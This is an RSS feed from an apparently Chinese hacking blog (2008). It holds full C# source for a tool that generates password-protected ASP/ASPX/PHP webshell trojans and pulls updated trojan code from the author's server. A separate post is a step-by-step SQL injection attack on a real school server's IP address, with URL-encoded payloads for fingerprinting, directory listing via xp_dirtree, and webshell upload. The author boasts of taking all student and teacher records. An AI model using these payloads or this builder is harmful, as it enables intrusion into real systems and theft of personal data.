http://www.xuyunfeng.com.cn/ zh-cn PBlog2 v2.4 http://www.xuyunfeng.com.cn/images/logos.gif http://www.xuyunfeng.com.cn/ 许云风's Blog http://www.xuyunfeng.com.cn/default.asp?id=206 xuyunfeng@xuyunfeng.com.cn(许云风) Thu,21 Aug 2008 17:23:58 +0800 http://www.xuyunfeng.com.cn/default.asp?id=206



]]> http://www.xuyunfeng.com.cn/default.asp?id=205 xuyunfeng@xuyunfeng.com.cn(许云风) Thu,17 Jul 2008 14:13:31 +0800 http://www.xuyunfeng.com.cn/default.asp?id=205 因为以前的服务器软件被我不小心删了,现在如果有什么软件不能下载,请朋友们在下面提出,我将依次修复,
多谢支持!]]> http://www.xuyunfeng.com.cn/default.asp?id=204 xuyunfeng@xuyunfeng.com.cn(许云风) Tue,08 Jul 2008 23:24:33 +0800 http://www.xuyunfeng.com.cn/default.asp?id=204 using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.IO;
using System.Net;
using System.Resources;
using System.Reflection;

namespace 云风WebShell生成器
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
             }
        public static Type type = MethodBase.GetCurrentMethod().DeclaringType;
        public static string _namespace = type.Namespace;
        Assembly currentAssembly = Assembly.GetExecutingAssembly();
        public static string resourceRootName = _namespace + ".xuyunfeng";
        public static int ok = 1;
        private void Form1_Load(object sender, EventArgs e)
        {
            try
            {
                ResourceManager rm = new ResourceManager(resourceRootName, currentAssembly);
                byte[] buffer = (byte[])rm.GetObject("skin");
                FileStream FS = new FileStream("skin.ssk", FileMode.Create);
                BinaryWriter BWriter = new BinaryWriter(FS);
                BWriter.Write(buffer, 0, buffer.Length);
                BWriter.Close();
                FS.Close();
                skinEngine1.SkinFile = "skin.ssk";
                this.CenterToScreen();
                this.SizeChanged += new System.EventHandler(this.Form1_SizeChanged);

                if (ok == 1)
                {
                    ok = ok + 1;
                    Form2 fm = new Form2();
                    this.Visible = false;
                    fm.ShowDialog();
                }
            }
            catch
            {
                MessageBox.Show("找到不到IrisSkin2.dll文件");
            }

        }
        private void Form1_SizeChanged(object sender, EventArgs e)
        {
             if (this.WindowState == FormWindowState.Minimized)
            {
                notifyIcon1.Visible = true;
                this.Hide();
            }

        }
          private void 退出ToolStripMenuItem_Click_1(object sender, EventArgs e)
        {
            this.Close();
        }


        private void notifyIcon1_Click(object sender, MouseEventArgs e)
        {
            this.Visible = true;
            this.WindowState = FormWindowState.Normal;
            this.CenterToScreen();
            this.notifyIcon1.Visible = false;
        }


        private void button20_Click(object sender, EventArgs e)
        {
            this.saveFileDialog2.ShowDialog();
            if (saveFileDialog2.FileName != "")
            {
                string x;
                x = textBox9.Text;
                StreamWriter ok = new StreamWriter(this.saveFileDialog2.FileName, false, Encoding.GetEncoding("gb2312"));
                ok.WriteLine(x);
                ok.Close();
                StreamReader sr = new StreamReader(this.saveFileDialog2.FileName, Encoding.GetEncoding("gb2312"));
                string str = sr.ReadToEnd();
                sr.Close();
                StreamWriter sw = new StreamWriter(this.saveFileDialog2.FileName, false, Encoding.GetEncoding("gb2312"));
                sw.WriteLine(str);
                sw.Close();
                MessageBox.Show("木马生成成功！", "提示！");
            }
        }

        private void button19_Click(object sender, EventArgs e)
        {
            this.saveFileDialog4.ShowDialog();
            if (saveFileDialog4.FileName != "")
            {
                StreamWriter ok = new StreamWriter(this.saveFileDialog4.FileName, false, Encoding.GetEncoding("gb2312"));
                ok.WriteLine(textBox10.Text);
                ok.Close();
                MessageBox.Show("木马生成成功！", "提示！");

            }
        }

        private void button17_Click(object sender, EventArgs e)
        {
            if (textBox7.Text != "")
            {
                this.saveFileDialog4.ShowDialog();
                if (saveFileDialog4.FileName != "")
                {
                    Type type = MethodBase.GetCurrentMethod().DeclaringType;

                    string _namespace = type.Namespace;

                    

                    Assembly currentAssembly = Assembly.GetExecutingAssembly();

                    //资源的根名称

                    string resourceRootName = _namespace + ".xuyunfeng";

                    

                    ResourceManager rm = new ResourceManager(resourceRootName, currentAssembly);

    
                    byte[] buffer = (byte[])rm.GetObject("php");
                    FileStream FS = new FileStream(saveFileDialog4.FileName, FileMode.Create);//新建文件
                    BinaryWriter BWriter = new BinaryWriter(FS);
                    BWriter.Write(buffer, 0, buffer.Length);
                    BWriter.Close();
                    FS.Close();
                    //读取文本　
                    StreamReader sr = new StreamReader(saveFileDialog4.FileName, Encoding.GetEncoding("gb2312"));
                    string str = sr.ReadToEnd();
                    sr.Close();

                    str = str.Replace("xuyunfeng", textBox7.Text.Trim());
                    //更改保存文本
                    StreamWriter sw = new StreamWriter(saveFileDialog4.FileName, false, Encoding.GetEncoding("gb2312"));
                    sw.WriteLine(str);
                    sw.Close();

                    MessageBox.Show("木马生成成功！", "提示！");
                }
            }
            else
            {
                MessageBox.Show("输入密码不能为空！", "提示！");
            }
        }

        private void button25_Click(object sender, EventArgs e)
        {
            this.saveFileDialog2.ShowDialog();
            if (saveFileDialog2.FileName != "")
            {
                string x;
                x = textBox12.Text;
                StreamWriter ok = new StreamWriter(this.saveFileDialog2.FileName, false, Encoding.GetEncoding("gb2312"));
                ok.WriteLine(x);
                ok.Close();
                StreamReader sr = new StreamReader(this.saveFileDialog2.FileName, Encoding.GetEncoding("gb2312"));
                string str = sr.ReadToEnd();
                sr.Close();
                StreamWriter sw = new StreamWriter(this.saveFileDialog2.FileName, false, Encoding.GetEncoding("gb2312"));
                sw.WriteLine(str);
                sw.Close();
                MessageBox.Show("木马生成成功！", "提示！");
            }
        }

        private void button24_Click(object sender, EventArgs e)
        {
            this.saveFileDialog3.ShowDialog();
            if (saveFileDialog3.FileName != "")
            {
                StreamWriter ok = new StreamWriter(this.saveFileDialog3.FileName, false, Encoding.GetEncoding("gb2312"));
                ok.WriteLine(textBox13.Text);
                ok.Close();
                MessageBox.Show("木马生成成功！", "提示！");

            }
        }

        private void button18_Click(object sender, EventArgs e)
        {
            this.saveFileDialog3.ShowDialog();
            if (saveFileDialog3.FileName != "")
            {
                StreamWriter ok = new StreamWriter(this.saveFileDialog3.FileName, false, Encoding.GetEncoding("gb2312"));
                ok.WriteLine(textBox14.Text);
                ok.Close();
                MessageBox.Show("木马生成成功！", "提示！");

            }
        }


        private void button22_Click(object sender, EventArgs e)
        {
            if (textBox8.Text != "")
            {
                this.saveFileDialog3.ShowDialog();
                if (saveFileDialog3.FileName != "")
                {
                    Type type = MethodBase.GetCurrentMethod().DeclaringType;

                    string _namespace = type.Namespace;

                    

                    Assembly currentAssembly = Assembly.GetExecutingAssembly();

                    //资源的根名称

                    string resourceRootName = _namespace + ".xuyunfeng";

                    

                    ResourceManager rm = new ResourceManager(resourceRootName, currentAssembly);

    
                    byte[] buffer = (byte[])rm.GetObject("aspx");
                    FileStream FS = new FileStream(saveFileDialog3.FileName, FileMode.Create);//新建文件
                    BinaryWriter BWriter = new BinaryWriter(FS);
                    BWriter.Write(buffer, 0, buffer.Length);
                    BWriter.Close();
                    FS.Close();
                    //读取文本　
                    StreamReader sr = new StreamReader(saveFileDialog3.FileName, Encoding.GetEncoding("gb2312"));
                    string str = sr.ReadToEnd();
                    sr.Close();

                    str = str.Replace("xuyunfeng", textBox8.Text.Trim());
                    //更改保存文本
                    StreamWriter sw = new StreamWriter(saveFileDialog3.FileName, false, Encoding.GetEncoding("gb2312"));
                    sw.WriteLine(str);
                    sw.Close();

                    MessageBox.Show("木马生成成功！", "提示！");
                }
            }
            else
            {
                MessageBox.Show("输入密码不能为空！", "提示！");
            }

        }

        private void button1_Click(object sender, EventArgs e)
        {
            this.saveFileDialog2.ShowDialog();
            if (saveFileDialog2.FileName != "")
            {
                string x;
                x = textBox1.Text;
                StreamWriter ok = new StreamWriter(this.saveFileDialog2.FileName, false, Encoding.GetEncoding("gb2312"));
                ok.WriteLine(x);
                ok.Close();
                StreamReader sr = new StreamReader(this.saveFileDialog2.FileName, Encoding.GetEncoding("gb2312"));
                string str = sr.ReadToEnd();
                sr.Close();
                StreamWriter sw = new StreamWriter(this.saveFileDialog2.FileName, false, Encoding.GetEncoding("gb2312"));
                sw.WriteLine(str);
                sw.Close();
                MessageBox.Show("木马生成成功！", "提示！");


            }
        }

        private void button2_Click(object sender, EventArgs e)
        {
            this.saveFileDialog1.ShowDialog();
            if (saveFileDialog1.FileName != "")
            {
                StreamWriter ok = new StreamWriter(this.saveFileDialog1.FileName, false, Encoding.GetEncoding("gb2312"));
                ok.WriteLine(textBox2.Text);
                ok.Close();
                MessageBox.Show("木马生成成功！", "提示！");

            }
        }

        private void button3_Click(object sender, EventArgs e)
        {
            this.saveFileDialog1.ShowDialog();
            if (saveFileDialog1.FileName != "")
            {
                StreamWriter ok = new StreamWriter(this.saveFileDialog1.FileName, false, Encoding.GetEncoding("gb2312"));
                ok.WriteLine(textBox3.Text);
                ok.Close();
                MessageBox.Show("木马生成成功！", "提示！");
            }
        }

        private void button4_Click(object sender, EventArgs e)
        {
            if (textBox4.Text != "")
            {
                this.saveFileDialog1.ShowDialog();
                if (saveFileDialog1.FileName != "")
                {
                    Type type = MethodBase.GetCurrentMethod().DeclaringType;

                    string _namespace = type.Namespace;

                    

                    Assembly currentAssembly = Assembly.GetExecutingAssembly();

                    //资源的根名称

                    string resourceRootName = _namespace + ".xuyunfeng";

                    

                    ResourceManager rm = new ResourceManager(resourceRootName, currentAssembly);

    
                    byte[] buffer = (byte[])rm.GetObject("muma");
                    FileStream FS = new FileStream(saveFileDialog1.FileName, FileMode.Create);//新建文件
                    BinaryWriter BWriter = new BinaryWriter(FS);
                    BWriter.Write(buffer, 0, buffer.Length);
                    BWriter.Close();
                    FS.Close();
                    //读取文本　
                    StreamReader sr = new StreamReader(saveFileDialog1.FileName, Encoding.GetEncoding("gb2312"));
                    string str = sr.ReadToEnd();
                    sr.Close();

                    str = str.Replace("xuyunfeng", textBox4.Text.Trim());
                    //更改保存文本
                    StreamWriter sw = new StreamWriter(saveFileDialog1.FileName, false, Encoding.GetEncoding("gb2312"));
                    sw.WriteLine(str);
                    sw.Close();

                    MessageBox.Show("木马生成成功！", "提示！");
                }
            }
            else
            {
                MessageBox.Show("输入密码不能为空！", "提示！");
            }

        }



        private void button5_Click_1(object sender, EventArgs e)
        {
        
            try
            {  
                string pd;
                WebClient xuyunfeng = new WebClient();
                Stream k = xuyunfeng.OpenRead("http://www.xuyunfeng.com.cn/asp/asp.txt");
                StreamReader j = new StreamReader(k, Encoding.GetEncoding("gb2312"));
                pd = j.ReadLine();

                if (File.Exists("xin.asp"))
                {
                  
                    string ceshi;
                    System.DateTime currentTime = new System.DateTime();
                    currentTime = System.DateTime.Now;
                    ceshi = currentTime.Year.ToString() + "年" + currentTime.Month.ToString() + "月" + currentTime.Day.ToString() + "日";
                    DateTime dt = File.GetLastWriteTime("xin.asp");
                    string changedata = dt.Year.ToString() + "年" + dt.Month.ToString() + "月" + dt.Day.ToString() + "日";
                    if (pd == changedata || pd==ceshi)
                    {
                        MessageBox.Show("当前已是最新！", "提示！");
                    }
                    else
                    {
                       string ce;
                        System.DateTime Time = new System.DateTime();
                        Time = System.DateTime.Now;
                        ce = Time.Year.ToString() + "年" + Time.Month.ToString() + "月" +Time.Day.ToString() + "日";
                        StreamWriter sw = new StreamWriter("xin.asp", false, Encoding.GetEncoding("gb2312"));
                        string y;
                        while ((y = j.ReadLine()) != null)
                        {
                            sw.WriteLine(y);
                        }
                        sw.Close();
                        MessageBox.Show("更新成功,文件名为xin.asp在本程序目录下！" + "\r" + "木马更新于" + ce, "提示！");
                    }

                }
                else
                {
                    string data = "2008年3月23日";
                    if (pd == data)
                    {
                        MessageBox.Show("当前已是最新！", "提示！");
                    }
                    else
                    {
                        string ceshi;
                        System.DateTime currentTime = new System.DateTime();
                        currentTime = System.DateTime.Now;
                        ceshi = currentTime.Year.ToString() + "年" + currentTime.Month.ToString() + "月" + currentTime.Day.ToString() + "日";
                        StreamWriter sw = new StreamWriter("xin.asp", false, Encoding.GetEncoding("gb2312"));
                        string y;
                        while ((y = j.ReadLine()) != null)
                        {
                            sw.WriteLine(y);
                        }
                        sw.Close();
                        MessageBox.Show("更新成功,文件名为xin.asp在本程序目录下！" + "\r" + "木马更新于" + ceshi, "提示！");

                    }

                }


            }
      
        catch
            {
                MessageBox.Show("请检查网络是否正常或更新服务器出错！", "提示！");
        }
            button5.Enabled = false;


    
    }

        private void button16_Click(object sender, EventArgs e)
        {
          
            try
            {
                string pd;
                WebClient xuyunfeng = new WebClient();
                Stream k = xuyunfeng.OpenRead("http://www.xuyunfeng.com.cn/php/php.txt");
                StreamReader j = new StreamReader(k, Encoding.GetEncoding("gb2312"));
                pd = j.ReadLine();


                if (File.Exists("xin.php"))
                {
            
                    string ceshi;
                    System.DateTime currentTime = new System.DateTime();
                    currentTime = System.DateTime.Now;
                    ceshi = currentTime.Year.ToString() + "年" + currentTime.Month.ToString() + "月" + currentTime.Day.ToString() + "日";
                    DateTime dt = File.GetLastWriteTime("xin.php");
                    string changedata = dt.Year.ToString() + "年" + dt.Month.ToString() + "月" + dt.Day.ToString() + "日";
                    if (pd == changedata || pd == ceshi)
                    {
                        MessageBox.Show("当前已是最新！", "提示！");
                    }
                    else
                    {
                        string ce;
                        System.DateTime Time = new System.DateTime();
                        Time = System.DateTime.Now;
                        ce = Time.Year.ToString() + "年" + Time.Month.ToString() + "月" + Time.Day.ToString() + "日";
                        StreamWriter sw = new StreamWriter("xin.php", false, Encoding.GetEncoding("gb2312"));
                        string y;
                        while ((y = j.ReadLine()) != null)
                        {
                            sw.WriteLine(y);
                        }
                        sw.Close();
                        MessageBox.Show("更新成功,文件名为xin.php在本程序目录下！" + "\r" + "木马更新于" + ce, "提示！");
                    }

                }
                else
                {
                    string data = "2008年3月23日";
                    if (pd == data)
                    {
                        MessageBox.Show("当前已是最新！", "提示！");
                    }
                    else
                    {
                        string ceshi;
                        System.DateTime currentTime = new System.DateTime();
                        currentTime = System.DateTime.Now;
                        ceshi = currentTime.Year.ToString() + "年" + currentTime.Month.ToString() + "月" + currentTime.Day.ToString() + "日";
                        StreamWriter sw = new StreamWriter("xin.php", false, Encoding.GetEncoding("gb2312"));
                        string y;
                        while ((y = j.ReadLine()) != null)
                        {
                            sw.WriteLine(y);
                        }
                        sw.Close();
                        MessageBox.Show("更新成功,文件名为xin.php在本程序目录下！" + "\r" + "木马更新于" + ceshi, "提示！");

                    }

                }


            }

            catch
            {
                MessageBox.Show("请检查网络是否正常或更新服务器出错！", "提示！");
            }
            button16.Enabled = false;
        }

        private void button21_Click(object sender, EventArgs e)
        {
          
            try
            {
                string pd;
                WebClient xuyunfeng = new WebClient();
                Stream k = xuyunfeng.OpenRead("http://www.xuyunfeng.com.cn/asp/asp.txt");
                StreamReader j = new StreamReader(k, Encoding.GetEncoding("gb2312"));
                pd = j.ReadLine();


                if (File.Exists("xin.aspx"))
                {
              
                    string ceshi;
                    System.DateTime currentTime = new System.DateTime();
                    currentTime = System.DateTime.Now;
                    ceshi = currentTime.Year.ToString() + "年" + currentTime.Month.ToString() + "月" + currentTime.Day.ToString() + "日";
                    DateTime dt = File.GetLastWriteTime("xin.aspx");
                    string changedata = dt.Year.ToString() + "年" + dt.Month.ToString() + "月" + dt.Day.ToString() + "日";
                    if (pd == changedata || pd == ceshi)
                    {
                        MessageBox.Show("当前已是最新！", "提示！");
                    }
                    else
                    {
                        string ce;
                        System.DateTime Time = new System.DateTime();
                        Time = System.DateTime.Now;
                        ce = Time.Year.ToString() + "年" + Time.Month.ToString() + "月" + Time.Day.ToString() + "日";
                        StreamWriter sw = new StreamWriter("xin.aspx", false, Encoding.GetEncoding("gb2312"));
                        string y;
                        while ((y = j.ReadLine()) != null)
                        {
                            sw.WriteLine(y);
                        }
                        sw.Close();
                        MessageBox.Show("更新成功,文件名为xin.aspx在本程序目录下！" + "\r" + "木马更新于" + ce, "提示！");
                    }

                }
                else
                {
                    string data = "2008年3月23日";
                    if (pd == data)
                    {
                        MessageBox.Show("当前已是最新！", "提示！");
                    }
                    else
                    {
                        string ceshi;
                        System.DateTime currentTime = new System.DateTime();
                        currentTime = System.DateTime.Now;
                        ceshi = currentTime.Year.ToString() + "年" + currentTime.Month.ToString() + "月" + currentTime.Day.ToString() + "日";
                        StreamWriter sw = new StreamWriter("xin.aspx", false, Encoding.GetEncoding("gb2312"));
                        string y;
                        while ((y = j.ReadLine()) != null)
                        {
                            sw.WriteLine(y);
                        }
                        sw.Close();
                        MessageBox.Show("更新成功,文件名为xin.aspx在本程序目录下！" + "\r" + "木马更新于" + ceshi, "提示！");

                    }

                }


            }

            catch
            {
                MessageBox.Show("请检查网络是否正常或更新服务器出错！", "提示！");
            }
            button21.Enabled = false;
        }

}
}


              
                ]]> http://www.xuyunfeng.com.cn/default.asp?id=203 xuyunfeng@xuyunfeng.com.cn(许云风) Sun,15 Jun 2008 16:19:32 +0800 http://www.xuyunfeng.com.cn/default.asp?id=203    对不起朋友们,最近因为工作原因不能更新博客,有的朋友说软件不能下载,
可以在网上搜索一下嘛!
       可能明年才有时间来管理博客了! ]]> http://www.xuyunfeng.com.cn/default.asp?id=202 xuyunfeng@xuyunfeng.com.cn(许云风) Sun,04 May 2008 16:51:21 +0800 http://www.xuyunfeng.com.cn/default.asp?id=202 下次改软件的时候,一定改进!!

]]> http://www.xuyunfeng.com.cn/default.asp?id=201 xuyunfeng@xuyunfeng.com.cn(许云风) Fri,25 Apr 2008 06:01:15 +0800 http://www.xuyunfeng.com.cn/default.asp?id=201

http://dx.3800hk.com/vipdown/vipdown/v09/200804/22706.html]]> http://www.xuyunfeng.com.cn/default.asp?id=200 xuyunfeng@xuyunfeng.com.cn(许云风) Fri,25 Apr 2008 01:16:54 +0800 http://www.xuyunfeng.com.cn/default.asp?id=200 都认为我过得好,很逍遥,很自在，什么也不用愁，也不用担心什么，其实他们没有想过天天对着代码是什么
感受，在学校的压力很大，不知道该何去何从，经常迷失方向，一些还追着加我，说这个软件不能用，那个
软件不能用，他们都不知道我测试软件花了很多时间，不能用怎么会发出去，虽然也会有很多BUG，但都是
测试后改过的，还围到软件不能下载，而埋怨我，不知道我说了好多次，以前放软件的服务器删了，可以到
网上去搜索一下，就可以了，烦啊！]]> http://www.xuyunfeng.com.cn/default.asp?id=199 xuyunfeng@xuyunfeng.com.cn(许云风) Mon,21 Apr 2008 00:42:11 +0800 http://www.xuyunfeng.com.cn/default.asp?id=199
该文件只允许会员下载! 登录 | 注册
]]> http://www.xuyunfeng.com.cn/default.asp?id=198 xuyunfeng@xuyunfeng.com.cn(许云风) Fri,18 Apr 2008 23:07:48 +0800 http://www.xuyunfeng.com.cn/default.asp?id=198 没什么技术含量,别见笑!呵呵,开始了,1.先判断是否存在注入:在地址后面打上'
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'

有防注入系统,限制了我的IP,现在就可以用COOKIES注入器
进入注入:


填写相应信息,生成1.asp,放到我服务器上次,地址是:http://www.xuyunfeng.com.cn/1.asp
加上参数为:http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048
现在尝试注入;http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048'

提示出错,试了一下不能注入,到了这里一般的朋友都放弃了,现在我们回到原来的注入点
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048一:暴数据库信息:
1.判断数据库名:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20and%20db_name()>0%20and%20''='

暴出数据库名为:wlxt
2.判断数据库用户名:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20and%20user>0%20and%20''='

数据库名为:wlxt136
3.判断数据库权限:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1%20and%20''='

暴出用户权限是:DB的,DB权限可以列目录，现在我们来列网站目录
二:列网站目录
1.创建表:xuyunfeng列C盘的文件和目录
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048';Drop%20TABLE%20xuyufeng;Create%20TABLE%20xuyunfeng(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Insert%20xuyunfeng%20exec%20master..xp_dirtree%20"C:\",%201,1--

提示防注入系统,不用管它,创建表成功
2:暴出C盘的文件和目录个数
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20xuyunfeng)=0%20%20and%20''='

暴出一共有13个目录和文件
3.列出第一个文件和目录(目录前面有0)
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%201%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='

第一个目录为:ASFRoot
4:列出第二个文件或目录:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%202%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='

第二个目录名为:Config.Msi
5.列第三个文件或目录名:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%203%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='

第三个目录为:Documents and Settings
依次这样列出C盘的所有目录和文件,依次可以列所网站的所有目录和文件,从而找到网站
我已经找到了:d:\webroot\wlxt\现在拿到数据库的信息和网站目录,现在可以通过数据库备份
写上一句话木马:
三:上传木马:
1.用到工具,DB备份工具

把得到的信息写到软件里,依次点击备份,不要管提示,我们看是否成功!

备份成功了，现在用一个免杀大马


点"给我冲进去"看是否成功!
http://218.6.168.52/wlxt/help.asp

成功了,输入密码进入!

我们成功拿到webshell,结束了这次检测!

我用工具拿到了整个数据库:包括所有学生和所有老师的信息,上面是所有老师的信息,但我们不能触犯法律,只是起技术的研究,有些并不是完全相同,好就到这了!
]]> http://www.xuyunfeng.com.cn/default.asp?id=197 xuyunfeng@xuyunfeng.com.cn(许云风) Tue,15 Apr 2008 04:45:31 +0800 http://www.xuyunfeng.com.cn/default.asp?id=197 ,我的软件全在上面,今天想用PG多格一个盘出来,没想到,我却一下点错了,整个移动硬盘的数据全没
了,真的气人,看来还是光盘安全!!!]]>